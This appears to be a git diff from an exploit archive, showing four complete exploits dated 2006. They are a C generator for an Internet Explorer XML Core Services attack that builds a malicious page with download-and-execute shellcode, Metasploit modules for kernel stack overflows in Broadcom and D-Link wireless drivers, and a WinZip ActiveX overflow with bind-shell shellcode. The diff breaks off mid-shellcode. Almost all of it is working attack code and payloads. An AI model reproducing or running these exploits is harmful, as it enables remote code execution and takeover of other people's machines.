@@ -1,183 +1,183 @@ -/* -*----------------------------------------------------------------------- -* -* MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit -* Works on Windows XP versions including SP2 and 2K -* -* Author: M03 -* -* Credit: metasploit, jamikazu, yag kohna(for the shellcode), LukeHack (for the code), -* Greetz: to PimpinOYeah Subbart n0limit MpR c0rrupt raze -* : -* Tested : -* : Windows XP SP2 + Internet Explorer 6.0, XP SP1, 2KServer -* : -* : -* : -* : -* :Usage: filename [htmlfile] -* : filename.exe http://site.com/file.exe localhtml.htm -* -*------------------------------------------------------------------------ -*/ - -#include -#include -#include - -FILE *fp = NULL; -char *file = "MicroHack.htm"; -char *url = NULL; - -unsigned char sc[] = -"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03" -"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74" -"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E" -"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03" -"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C" -"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40" -"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C" -"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC" -"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F" -"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB" -"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83" -"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF" -"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"; - -char * header = -"\n" -"\n" -"\n" -"\n" -"\n" -"\n" -"\n" -"\n" -"\n"; - -// print unicode shellcode -void PrintPayLoad(char *lpBuff, int buffsize) -{ - int i; - for(i=0;i [Local htmlfile]\r\n\n", argv[0]); - exit(1); - } - - url = argv[1]; - - - if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10) - { - 
printf("[-] Invalid url. Must start with 'http://','ftp://'\n"); - return; - } - - printf("[+] download url:%s\n", url); - - if(argc >=3) file = argv[2]; - printf("[+] exploit file:%s\n", file); - - fp = fopen(file, "w"); - if(!fp) - { - printf("[-] Open file error!\n"); - return; - } - - fprintf(fp, "%s", header); - fflush(fp); - - memset(buf, 0, sizeof(buf)); - sc_len = sizeof(sc)-1; - memcpy(buf, sc, sc_len); - memcpy(buf+sc_len, url, strlen(url)); - - sc_len += strlen(url)+1; - PrintPayLoad(buf, sc_len); - - fprintf(fp, "%s", footer); - fflush(fp); - - printf("[+] exploit write to %s success!\n", file); -} - -// Reverse Microsoft IE 9/11 Exploit - -// milw0rm.com [2006-11-10] +/* +*----------------------------------------------------------------------- +* +* MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit +* Works on Windows XP versions including SP2 and 2K +* +* Author: M03 +* +* Credit: metasploit, jamikazu, yag kohna(for the shellcode), LukeHack (for the code), +* Greetz: to PimpinOYeah Subbart n0limit MpR c0rrupt raze +* : +* Tested : +* : Windows XP SP2 + Internet Explorer 6.0, XP SP1, 2KServer +* : +* : +* : +* : +* :Usage: filename [htmlfile] +* : filename.exe http://site.com/file.exe localhtml.htm +* +*------------------------------------------------------------------------ +*/ + +#include +#include +#include + +FILE *fp = NULL; +char *file = "MicroHack.htm"; +char *url = NULL; + +unsigned char sc[] = +"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03" +"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74" +"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E" +"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03" +"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C" +"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40" +"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C" 
+"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC" +"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F" +"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB" +"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83" +"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF" +"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"; + +char * header = +"\n" +"\n" +"\n" +"\n" +"\n" +"\n" +"\n" +"\n" +"\n"; + +// print unicode shellcode +void PrintPayLoad(char *lpBuff, int buffsize) +{ + int i; + for(i=0;i [Local htmlfile]\r\n\n", argv[0]); + exit(1); + } + + url = argv[1]; + + + if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10) + { + printf("[-] Invalid url. Must start with 'http://','ftp://'\n"); + return; + } + + printf("[+] download url:%s\n", url); + + if(argc >=3) file = argv[2]; + printf("[+] exploit file:%s\n", file); + + fp = fopen(file, "w"); + if(!fp) + { + printf("[-] Open file error!\n"); + return; + } + + fprintf(fp, "%s", header); + fflush(fp); + + memset(buf, 0, sizeof(buf)); + sc_len = sizeof(sc)-1; + memcpy(buf, sc, sc_len); + memcpy(buf+sc_len, url, strlen(url)); + + sc_len += strlen(url)+1; + PrintPayLoad(buf, sc_len); + + fprintf(fp, "%s", footer); + fflush(fp); + + printf("[+] exploit write to %s success!\n", file); +} + +// Reverse Microsoft IE 9/11 Exploit + +// milw0rm.com [2006-11-10] diff --git a/platforms/windows/remote/2770.rb b/platforms/windows/remote/2770.rb index 452f7896b..733d3d7de 100755 --- a/platforms/windows/remote/2770.rb +++ b/platforms/windows/remote/2770.rb 
@@ -1,200 +1,200 @@ -require 'msf/core' - -module Msf - -class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote - - include Exploit::Lorcon - include Exploit::KernelMode - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Broadcom Wireless Driver Probe Response SSID Overflow', - 'Description' => %q{ - This module exploits a stack overflow in the Broadcom Wireless driver - that allows remote code execution in kernel mode by sending a 802.11 probe - response that contains a long SSID. The target MAC address must - be provided to use this exploit. The two cards tested fell into the - 00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges. - - This module depends on the Lorcon library and only works on the Linux platform - with a supported wireless card. Please see the Ruby Lorcon documentation - (external/ruby-lorcon/README) for more information. - }, - - 'Authors' => - [ - 'Chris Eagle', # initial discovery - 'Johnny Cache ', # the man with the plan - 'skape', # windows kernel ninjitsu and debugging - 'hdm' # porting the C version to ruby - ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 3583 $', - 'References' => - [ - ['URL', 'http://projects.info-pull.com/mokb/MOKB-11-11-2006.html'], - ], - 'Privileged' => true, - - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - - 'Payload' => - { - 'Space' => 500 - }, - 'Platform' => 'win', - 'Targets' => - [ - # 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519) - [ 'Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10', - { - 'Ret' => 0x8066662c, # jmp edi - 'Platform' => 'win', - 'Payload' => - { - 'ExtendedOptions' => - { - 'Stager' => 'sud_syscall_hook', - 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 - 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dbb27, - - } - } - } - ], - - # 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158) - [ 'Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10', - { - 'Ret' => 0x804f16eb, # jmp edi - 'Platform' => 'win', - 'Payload' 
=> - { - 'ExtendedOptions' => - { - 'Stager' => 'sud_syscall_hook', - 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 - 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dc0c7, - } - } - } - ] - ], - - 'DefaultTarget' => 0 - )) - - register_options( - [ - OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']), - OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]) - ], self.class) - end - - def exploit - open_wifi - - stime = Time.now.to_i - - print_status("Sending beacons and responses for #{datastore['RUNTIME']} seconds...") - - while (stime + datastore['RUNTIME'].to_i > Time.now.to_i) - - select(nil, nil, nil, 0.02) - wifi.write(create_response) - - select(nil, nil, nil, 0.01) - wifi.write(create_beacon) - - break if session_created? - - end - - print_status("Finished sending frames...") - end - - def create_beacon - src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93 - dst = eton('FF:FF:FF:FF:FF:FF') - seq = [Time.now.to_i % 4096].pack('n') - - blob = create_frame - blob[0,1] = 0x80.chr - blob[4,6] = dst - blob[10,6] = src - blob[16,6] = src - blob[22,2] = seq - - blob - end - - def create_response - src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93 - dst = eton(datastore['ADDR_DST']) - seq = [Time.now.to_i % 256].pack('n') - - blob = create_frame - blob[0,1] = 0x50.chr - blob[4,6] = dst - blob[10,6] = src - blob[16,6] = src # bssid field, good idea to set to src. 
- blob[22,2] = seq - - blob - end - - def create_frame - "\x80" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - "\xff\xff\xff\xff\xff\xff" + # dst - "\x58\x58\x58\x58\x58\x58" + # src - "\x58\x58\x58\x58\x58\x58" + # bssid - "\x70\xed" + # sequence number - - # - # fixed parameters - # - - # timestamp value - Rex::Text.rand_text_alphanumeric(8) + - "\x64\x00" + # beacon interval - "\x11\x04" + # capability flags - - # - # tagged parameters - # - - # ssid tag - "\x00" + # tag: SSID parameter set - "\x5d" + # len: length is 93 bytes - - # jump into the payload - "\x89\xf9" + # mov edi, ecx - "\x81\xc1\x7b\x00\x00\x00" + # add ecx, 0x7b - "\xff\xe1" + # jmp ecx - - # padding - Rex::Text.rand_text_alphanumeric(79) + - - # return address - [target.ret].pack('V') + - - # vendor specific tag - "\xdd" + # wpa - "\xff" + # big as we can make it - - # the kernel-mode stager - payload.encoded - end - -end -end - -# milw0rm.com [2006-11-13] +require 'msf/core' + +module Msf + +class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote + + include Exploit::Lorcon + include Exploit::KernelMode + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Broadcom Wireless Driver Probe Response SSID Overflow', + 'Description' => %q{ + This module exploits a stack overflow in the Broadcom Wireless driver + that allows remote code execution in kernel mode by sending a 802.11 probe + response that contains a long SSID. The target MAC address must + be provided to use this exploit. The two cards tested fell into the + 00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges. + + This module depends on the Lorcon library and only works on the Linux platform + with a supported wireless card. Please see the Ruby Lorcon documentation + (external/ruby-lorcon/README) for more information. 
+ }, + + 'Authors' => + [ + 'Chris Eagle', # initial discovery + 'Johnny Cache ', # the man with the plan + 'skape', # windows kernel ninjitsu and debugging + 'hdm' # porting the C version to ruby + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 3583 $', + 'References' => + [ + ['URL', 'http://projects.info-pull.com/mokb/MOKB-11-11-2006.html'], + ], + 'Privileged' => true, + + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + + 'Payload' => + { + 'Space' => 500 + }, + 'Platform' => 'win', + 'Targets' => + [ + # 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519) + [ 'Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10', + { + 'Ret' => 0x8066662c, # jmp edi + 'Platform' => 'win', + 'Payload' => + { + 'ExtendedOptions' => + { + 'Stager' => 'sud_syscall_hook', + 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 + 'Recovery' => 'idlethread_restart', + 'KiIdleLoopAddress' => 0x804dbb27, + + } + } + } + ], + + # 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158) + [ 'Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10', + { + 'Ret' => 0x804f16eb, # jmp edi + 'Platform' => 'win', + 'Payload' => + { + 'ExtendedOptions' => + { + 'Stager' => 'sud_syscall_hook', + 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 + 'Recovery' => 'idlethread_restart', + 'KiIdleLoopAddress' => 0x804dc0c7, + } + } + } + ] + ], + + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']), + OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]) + ], self.class) + end + + def exploit + open_wifi + + stime = Time.now.to_i + + print_status("Sending beacons and responses for #{datastore['RUNTIME']} seconds...") + + while (stime + datastore['RUNTIME'].to_i > Time.now.to_i) + + select(nil, nil, nil, 0.02) + wifi.write(create_response) + + select(nil, nil, nil, 0.01) + wifi.write(create_beacon) + + break if session_created? 
+ + end + + print_status("Finished sending frames...") + end + + def create_beacon + src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93 + dst = eton('FF:FF:FF:FF:FF:FF') + seq = [Time.now.to_i % 4096].pack('n') + + blob = create_frame + blob[0,1] = 0x80.chr + blob[4,6] = dst + blob[10,6] = src + blob[16,6] = src + blob[22,2] = seq + + blob + end + + def create_response + src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93 + dst = eton(datastore['ADDR_DST']) + seq = [Time.now.to_i % 256].pack('n') + + blob = create_frame + blob[0,1] = 0x50.chr + blob[4,6] = dst + blob[10,6] = src + blob[16,6] = src # bssid field, good idea to set to src. + blob[22,2] = seq + + blob + end + + def create_frame + "\x80" + # type/subtype + "\x00" + # flags + "\x00\x00" + # duration + "\xff\xff\xff\xff\xff\xff" + # dst + "\x58\x58\x58\x58\x58\x58" + # src + "\x58\x58\x58\x58\x58\x58" + # bssid + "\x70\xed" + # sequence number + + # + # fixed parameters + # + + # timestamp value + Rex::Text.rand_text_alphanumeric(8) + + "\x64\x00" + # beacon interval + "\x11\x04" + # capability flags + + # + # tagged parameters + # + + # ssid tag + "\x00" + # tag: SSID parameter set + "\x5d" + # len: length is 93 bytes + + # jump into the payload + "\x89\xf9" + # mov edi, ecx + "\x81\xc1\x7b\x00\x00\x00" + # add ecx, 0x7b + "\xff\xe1" + # jmp ecx + + # padding + Rex::Text.rand_text_alphanumeric(79) + + + # return address + [target.ret].pack('V') + + + # vendor specific tag + "\xdd" + # wpa + "\xff" + # big as we can make it + + # the kernel-mode stager + payload.encoded + end + +end +end + +# milw0rm.com [2006-11-13] diff --git a/platforms/windows/remote/2771.rb b/platforms/windows/remote/2771.rb index db54affbb..1885c9739 100755 --- a/platforms/windows/remote/2771.rb +++ b/platforms/windows/remote/2771.rb 
@@ -1,189 +1,189 @@ -require 'msf/core' - -module Msf - -class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remote - - include Exploit::Lorcon - include Exploit::KernelMode - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'D-Link DWL-G132 Wireless Driver Beacon Rates Overflow', - 'Description' => %q{ - This module exploits a stack overflow in the A5AGU.SYS driver provided - with the D-Link DWL-G132 USB wireless adapter. This stack overflow - allows remote code execution in kernel mode. The stack overflow is triggered - when a 802.11 Beacon frame is received that contains a long Rates information - element. This exploit was tested with version 1.0.1.41 of the - A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer - versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340 - adapter and appear to resolve this flaw, but D-Link does not offer an updated - driver for the DWL-G132. Since this vulnerability is exploited via beacon frames, - all cards within range of the attack will be affected. The tested adapter used - a MAC address in the range of 00:11:95:f2:XX:XX. - - Vulnerable clients will need to have their card in a non-associated state - for this exploit to work. The easiest way to reproduce this bug is by starting - the exploit and then accessing the Windows wireless network browser and - forcing it to refresh. - - D-Link was NOT contacted about this flaw. A search of the SecurityFocus - database indicates that D-Link has not provided an official patch or - solution for any of the seven flaws listed at the time of writing: - (BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689). - - This module depends on the Lorcon library and only works on the Linux platform - with a supported wireless card. Please see the Ruby Lorcon documentation - (external/ruby-lorcon/README) for more information. 
- }, - - 'Authors' => - [ - 'hdm', # discovery, exploit dev - 'skape', # windows kernel ninjitsu - 'Johnny Cache ' # making all of this possible - ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 3583 $', - 'References' => - [ - ['URL', 'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'], - ], - 'Privileged' => true, - - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - - 'Payload' => - { - # Its a beautiful day in the neighborhood... - 'Space' => 1000 - }, - 'Platform' => 'win', - 'Targets' => - [ - # Windows XP SP2 with the latest updates - # 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519) - [ 'Windows XP SP2 (5.1.2600.2122), A5AGU.sys 1.0.1.41', - { - 'Ret' => 0x8066662c, # jmp edi - 'Platform' => 'win', - 'Payload' => - { - 'ExtendedOptions' => - { - 'Stager' => 'sud_syscall_hook', - 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 - 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dbb27, - } - } - } - ], - - # Windows XP SP2 install media, no patches - # 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158) - [ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41', - { - 'Ret' => 0x804f16eb, # jmp edi - 'Platform' => 'win', - 'Payload' => - { - 'ExtendedOptions' => - { - 'Stager' => 'sud_syscall_hook', - 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 - 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dc0c7, - } - } - } - ] - ], - - - 'DefaultTarget' => 0 - )) - - register_options( - [ - OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']), - OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]) - ], self.class) - end - - def exploit - open_wifi - - stime = Time.now.to_i - rtime = datastore['RUNTIME'].to_i - count = 0 - - print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...") - while (stime + rtime > Time.now.to_i) - wifi.write(create_beacon) - select(nil, nil, nil, 0.10) if (count % 100 == 0) - - count 
+= 1 - - # Exit if we get a session - break if session_created? - end - - print_status("Completed sending beacons.") - end - - -# -# The long rates field bug can be triggered three different ways (at least): -# 1) Send a single rates IE with valid rates up front and long data -# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data (thanks gil!) -# 3) Send two IE rates fields, with the second one containing the long data (this exploit) -# - def create_beacon - - ssid = Rex::Text.rand_text_alphanumeric(6) - bssid = ("\x00" * 2) + Rex::Text.rand_text(4) - src = ("\x90" * 4) + "\xeb\x2b" - seq = [rand(255)].pack('n') - - buff = Rex::Text.rand_text(75) - buff[0, 2] = "\xeb\x49" - buff[71, 4] = [target.ret].pack('V') - - frame = - "\x80" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - "\xff\xff\xff\xff\xff\xff" + # dst - src + # src - bssid + # bssid - seq + # seq - Rex::Text.rand_text(8) + # timestamp value - "\x64\x00" + # beacon interval - "\x00\x05" + # capability flags - - # ssid tag - "\x00" + ssid.length.chr + ssid + - - # supported rates - "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + - - # current channel - "\x03" + "\x01" + channel.chr + - - # eip was his name-o - "\x01" + buff.length.chr + buff + - - payload.encoded - - return frame - end - -end -end - -# milw0rm.com [2006-11-13] +require 'msf/core' + +module Msf + +class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remote + + include Exploit::Lorcon + include Exploit::KernelMode + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'D-Link DWL-G132 Wireless Driver Beacon Rates Overflow', + 'Description' => %q{ + This module exploits a stack overflow in the A5AGU.SYS driver provided + with the D-Link DWL-G132 USB wireless adapter. This stack overflow + allows remote code execution in kernel mode. 
The stack overflow is triggered + when a 802.11 Beacon frame is received that contains a long Rates information + element. This exploit was tested with version 1.0.1.41 of the + A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer + versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340 + adapter and appear to resolve this flaw, but D-Link does not offer an updated + driver for the DWL-G132. Since this vulnerability is exploited via beacon frames, + all cards within range of the attack will be affected. The tested adapter used + a MAC address in the range of 00:11:95:f2:XX:XX. + + Vulnerable clients will need to have their card in a non-associated state + for this exploit to work. The easiest way to reproduce this bug is by starting + the exploit and then accessing the Windows wireless network browser and + forcing it to refresh. + + D-Link was NOT contacted about this flaw. A search of the SecurityFocus + database indicates that D-Link has not provided an official patch or + solution for any of the seven flaws listed at the time of writing: + (BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689). + + This module depends on the Lorcon library and only works on the Linux platform + with a supported wireless card. Please see the Ruby Lorcon documentation + (external/ruby-lorcon/README) for more information. + }, + + 'Authors' => + [ + 'hdm', # discovery, exploit dev + 'skape', # windows kernel ninjitsu + 'Johnny Cache ' # making all of this possible + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 3583 $', + 'References' => + [ + ['URL', 'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'], + ], + 'Privileged' => true, + + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + + 'Payload' => + { + # Its a beautiful day in the neighborhood... 
+ 'Space' => 1000 + }, + 'Platform' => 'win', + 'Targets' => + [ + # Windows XP SP2 with the latest updates + # 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519) + [ 'Windows XP SP2 (5.1.2600.2122), A5AGU.sys 1.0.1.41', + { + 'Ret' => 0x8066662c, # jmp edi + 'Platform' => 'win', + 'Payload' => + { + 'ExtendedOptions' => + { + 'Stager' => 'sud_syscall_hook', + 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 + 'Recovery' => 'idlethread_restart', + 'KiIdleLoopAddress' => 0x804dbb27, + } + } + } + ], + + # Windows XP SP2 install media, no patches + # 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158) + [ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41', + { + 'Ret' => 0x804f16eb, # jmp edi + 'Platform' => 'win', + 'Payload' => + { + 'ExtendedOptions' => + { + 'Stager' => 'sud_syscall_hook', + 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 + 'Recovery' => 'idlethread_restart', + 'KiIdleLoopAddress' => 0x804dc0c7, + } + } + } + ] + ], + + + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']), + OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]) + ], self.class) + end + + def exploit + open_wifi + + stime = Time.now.to_i + rtime = datastore['RUNTIME'].to_i + count = 0 + + print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...") + while (stime + rtime > Time.now.to_i) + wifi.write(create_beacon) + select(nil, nil, nil, 0.10) if (count % 100 == 0) + + count += 1 + + # Exit if we get a session + break if session_created? + end + + print_status("Completed sending beacons.") + end + + +# +# The long rates field bug can be triggered three different ways (at least): +# 1) Send a single rates IE with valid rates up front and long data +# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data (thanks gil!) 
+# 3) Send two IE rates fields, with the second one containing the long data (this exploit) +# + def create_beacon + + ssid = Rex::Text.rand_text_alphanumeric(6) + bssid = ("\x00" * 2) + Rex::Text.rand_text(4) + src = ("\x90" * 4) + "\xeb\x2b" + seq = [rand(255)].pack('n') + + buff = Rex::Text.rand_text(75) + buff[0, 2] = "\xeb\x49" + buff[71, 4] = [target.ret].pack('V') + + frame = + "\x80" + # type/subtype + "\x00" + # flags + "\x00\x00" + # duration + "\xff\xff\xff\xff\xff\xff" + # dst + src + # src + bssid + # bssid + seq + # seq + Rex::Text.rand_text(8) + # timestamp value + "\x64\x00" + # beacon interval + "\x00\x05" + # capability flags + + # ssid tag + "\x00" + ssid.length.chr + ssid + + + # supported rates + "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + + + # current channel + "\x03" + "\x01" + channel.chr + + + # eip was his name-o + "\x01" + buff.length.chr + buff + + + payload.encoded + + return frame + end + +end +end + +# milw0rm.com [2006-11-13] diff --git a/platforms/windows/remote/2785.c b/platforms/windows/remote/2785.c index 37524429e..9410ad83a 100755 --- a/platforms/windows/remote/2785.c +++ b/platforms/windows/remote/2785.c 
@@ -1,315 +1,315 @@
-/* WinZip <= 10.0.7245 FileView ActiveX buffer overflow exploit
- * ============================================================
- * A vulnerability has been identified within Winzip that allows remote
- * attackers to execute arbitrary code. User interaction is required to
- * exploit this vulnerability in that the target must visit a malicious
- * web page. The flaw exists within "FileView" ActiveX control which
- * contains stack based overflow conditions. This exploit generates a
- * malicious html page and contains shellcode embedded within an image
- * file. Due to the random nature of the heap, this exploit uses hard
- * coded location of the image bytes within the heap and as such is
- * unreliable in exploitation of this bug, but has approximately 1 in
- * 6 hit ratio within the tested environment.
- *
- * Example.
- * $ ./prdelka-vs-MS-winzip -f index.html -i foo.bmp -s 0 -t 0
- * [ WinZip <= 10.0.7245 FileView ActiveX overflow exploit
- * [ Using shellcode 'Win32 x86 bind() shellcode (4444/tcp default)' (400 bytes)
- * [ Using target 'WinXP SP2(en) WinZIP 10.0.6667'
- * [ Creating image containing shellcode 'foo.bmp'
- * [ Creating html exploit page 'index.html'
- * $
- * ... clicky clicky MSIE ...
- * $ telnet 192.168.1.223 4444
- * Connected to 192.168.1.223.
- * Escape character is '^]'.
- *
- * Microsoft Windows XP [Version 5.1.2600]
- * (C) Copyright 1985-2001 Microsoft Corp.
- *
- * C:\Documents and Settings\User\Desktop>
- *
- * - prdelka
- */
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-#define NOPSIZE 999999
-
-struct target {
- char* name;
- int retaddr;
-};
-
-struct shellcode {
- char* name;
- short port;
- int host;
- char* shellcode;
-};
-
-int targetno = 1;
-
-struct target targets[] = {
- {"WinXP SP2(en) WinZIP 10.0.6667",0x02DA3269}
- /* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667)" */
-};
-
-int shellno = 2;
-
-struct shellcode shellcodes[] = {
- {"Win32 x86 bind() shellcode (4444/tcp default)",162,-1,
- "\x48\x40\xf5\x49\xd6\x4a\xf9\x91\x47\x96\x2f\xf8\x9b\x37\x41\xf5"
- "\x99\x47\xf9\xf9\xfc\xf9\x48\x4e\x4b\x9b\x90\x9b\xf5\x97\x40\xf9"
- "\xd6\x41\xf9\x48\x9b\x92\xfd\x9b\x49\x42\x4f\x9f\x90\xd6\x27\x9b"
- "\x93\x46\x2f\x90\xfd\x4a\x6a\x51\x59\xd9\xee\xd9\x74\x24\xf4\x5b"
- "\x81\x73\x13\xbc\xe8\x2b\x27\x83\xeb\xfc\xe2\xf4\x3d\x2c\x7f\xd5"
- "\x43\x17\xd7\x4d\x57\xa5\xc3\xde\x43\x17\xd4\x47\x37\x84\x0f\x03"
- "\x37\xad\x17\xac\xc0\xed\x53\x26\x53\x63\x64\x3f\x37\xb7\x0b\x26"
- "\x57\xa1\xa0\x13\x37\xe9\xc5\x16\x7c\x71\x87\xa3\x7c\x9c\x2c\xe6"
- "\x76\xe5\x2a\xe5\x57\x1c\x10\x73\x98\xc0\x5e\xc2\x37\xb7\x0f\x26"
- "\x57\x8e\xa0\x2b\xf7\x63\x74\x3b\xbd\x03\x28\x0b\x37\x61\x47\x03"
- "\xa0\x89\xe8\x16\x67\x8c\xa0\x64\x8c\x63\x6b\x2b\x37\x98\x37\x8a"
- "\x37\xa8\x23\x79\xd4\x66\x65\x29\x50\xb8\xd4\xf1\xda\xbb\x4d\x4f"
- "\x8f\xda\x43\x50\xcf\xda\x74\x73\x43\x38\x43\xec\x51\x14\x10\x77"
- "\x43\x3e\x74\xae\x59\x8e\xaa\xca\xb4\xea\x7e\x4d\xbe\x17\xfb\x4f"
- "\x65\xe1\xde\x8a\xeb\x17\xfd\x74\xef\xbb\x78\x74\xff\xbb\x68\x74"
